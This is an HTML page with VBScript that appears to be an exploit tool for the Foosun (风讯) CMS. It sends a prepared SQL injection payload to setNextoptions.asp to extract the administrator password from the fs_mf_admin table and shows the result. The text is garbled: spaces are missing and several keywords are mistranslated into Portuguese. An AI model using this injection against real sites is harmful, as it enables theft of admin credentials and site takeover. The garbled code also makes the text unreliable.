<ScriptLanguage = "vBScript">
Subwindow_onload
Window.RESIZETO450.380
window.moveto300.300
Endsub
</Script>
<ScriptLanguage = "vBScript">
Functiongethttppage (caminho)
t = getBody (caminho)
gethttppage = bytestobstr (t, "gb2312")
Document.getElementById ("URL"). InnerText = Gethttppage
Função final
</script>
<ScriptLanguage = "vBScript">
FunctionGetBody (URL)
OnErrorReSumenext
Setretrieval = CreateObject ("Microsoft.xmlHttp")
Withretrieval
.Popen "Get", URL, False, "", ""
.Enviar
GetBody = .ResponseBody
ENDWITH
Setretrieval = nada
Função final
FunctionByTestobstr (corpo, cset)
DIMOBJSTREAM
SetObjstream = CreateObject ("adodb.stream")
objstream.type = 1
objstream.mode = 3
objstream.open
objstream.writebody
objstream.Position = 0
objstream.type = 2
objstream.charset = cset
Bytestobstr = objStream.readText
objstream.close
Setobjstream = nada
Função final
</script>
<title> BYLCX </title>
<inputId = "urlcode" name = "urlcode" size = "60" value = "http: // 风讯 url/user/setNextoptions.asp">
<selectId = "sql" name = "sql" onchange = vbs: gethttppage (document.getElementById ("urlcode"). value+document.getElementById ("sql"). value)>
<pptionValue = ""> 风讯 SQL 版注入 , 至于其它备份 Shell 的语句懒得写了 </pption>
<optionValue = "? Equvalue = 1 & reqsql = selecione%201, admin_pass_word, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,50,51%20from%20fs_mf_admin%20where%20iD = 1-")